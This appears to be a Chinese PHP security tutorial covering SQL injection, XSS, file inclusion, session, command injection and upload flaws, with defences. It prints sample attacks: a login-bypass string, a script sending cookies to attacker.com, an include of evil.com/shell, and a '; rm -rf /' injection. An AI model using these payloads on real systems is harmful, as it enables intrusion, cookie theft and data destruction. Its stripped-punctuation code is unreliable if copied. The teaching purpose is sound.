1. PHP安全攻击概述PHP作为全球使用最广泛的服务器端脚本语言之一其安全性问题一直备受关注。根据最新统计超过75%的PHP网站存在至少一个高危安全漏洞。这些漏洞轻则导致数据泄露重则可能引发服务器被完全控制。在实际开发中我们经常遇到的PHP安全威胁主要来自六个方面每种攻击都有其特定的攻击原理和防御策略。2. SQL注入攻击2.1 攻击原理与危害SQL注入是最常见也最危险的PHP安全漏洞之一。攻击者通过在表单输入、URL参数等位置插入恶意SQL代码欺骗服务器执行非预期的数据库操作。典型的攻击场景包括绕过登录验证获取敏感数据执行数据库管理操作删除或篡改数据例如当登录表单使用以下代码时$query SELECT * FROM users WHERE username.$_POST[username]. AND password.$_POST[password].;攻击者可以在用户名输入admin --这将导致SQL语句变为SELECT * FROM users WHERE usernameadmin -- AND password注释符--使密码验证失效直接以admin身份登录。2.2 防御措施使用预处理语句PDO或MySQLi$stmt $pdo-prepare(SELECT * FROM users WHERE username :username AND password :password); $stmt-execute([username $username, password $password]);输入过滤与验证$username filter_input(INPUT_POST, username, FILTER_SANITIZE_STRING);最小权限原则数据库用户只授予必要权限注意不要依赖magic_quotes_gpc它已在PHP5.4移除且存在诸多问题3. 跨站脚本攻击(XSS)3.1 攻击类型与示例XSS攻击分为三类存储型XSS恶意脚本被存入数据库反射型XSS通过URL参数即时执行DOM型XSS客户端脚本操作DOM时触发典型攻击代码scriptdocument.locationhttp://attacker.com/?cookiedocument.cookie/script3.2 全面防护方案输出编码echo htmlspecialchars($user_input, ENT_QUOTES, UTF-8);内容安全策略(CSP)header(Content-Security-Policy: default-src self);HttpOnly Cookieini_set(session.cookie_httponly, 1);4. 文件包含漏洞4.1 本地与远程文件包含危险代码示例include($_GET[page]..php);攻击者可构造URL?pagehttp://evil.com/shell4.2 安全防护实践禁用危险函数allow_url_fopen Off allow_url_include Off白名单验证$allowed [home.php, about.php]; if(in_array($_GET[page], $allowed)) { include($_GET[page]..php); }设置open_basediropen_basedir /var/www/html5. 会话劫持与固定5.1 常见攻击手法会话ID窃取通过XSS或网络嗅探会话固定强制用户使用已知会话ID5.2 强化会话安全会话配置优化ini_set(session.cookie_secure, 1); // HTTPS only ini_set(session.cookie_httponly, 1); // 禁止JS访问 ini_set(session.use_strict_mode, 1); // 防止会话固定定期更换会话IDsession_regenerate_id(true);多因素验证绑定用户IP/User-Agent6. 命令注入攻击6.1 危险函数示例system(ping .$_GET[ip]);攻击者可输入127.0.0.1; rm -rf /6.2 安全编码规范避免使用shell函数// 危险 system(), exec(), passthru(), shell_exec() // 相对安全 escapeshellarg(), escapeshellcmd()使用替代方案// 代替shell命令 file_get_contents(http://127.0.0.1/ping?ip.urlencode($ip));7. 文件上传漏洞7.1 常见绕过手法修改Content-Type头使用双扩展名.php.jpg空字节截断已修复7.2 安全上传策略文件类型验证$finfo new finfo(FILEINFO_MIME_TYPE); $mime $finfo-file($_FILES[file][tmp_name]);存储安全上传目录禁用PHP执行随机化文件名存储到数据库而非文件系统图像二次渲染$img imagecreatefromjpeg($_FILES[file][tmp_name]); imagejpeg($img, $new_path, 90);8. 综合防御体系8.1 PHP安全配置expose_php Off display_errors Off log_errors On disable_functions exec,passthru,shell_exec,system8.2 安全开发实践使用最新PHP版本PHP 8.2定期依赖项更新Composer代码审计工具PHPStan, PsalmWeb应用防火墙ModSecurity8.3 应急响应计划日志监控ELK Stack入侵检测系统OSSEC定期备份验证在实际项目中我曾遇到一个案例攻击者通过组合SQL注入和文件包含漏洞最终获取了服务器权限。这提醒我们安全防护需要多层次、全方位的考虑。建议开发团队至少每季度进行一次完整的安全审计并建立自动化的安全测试流程。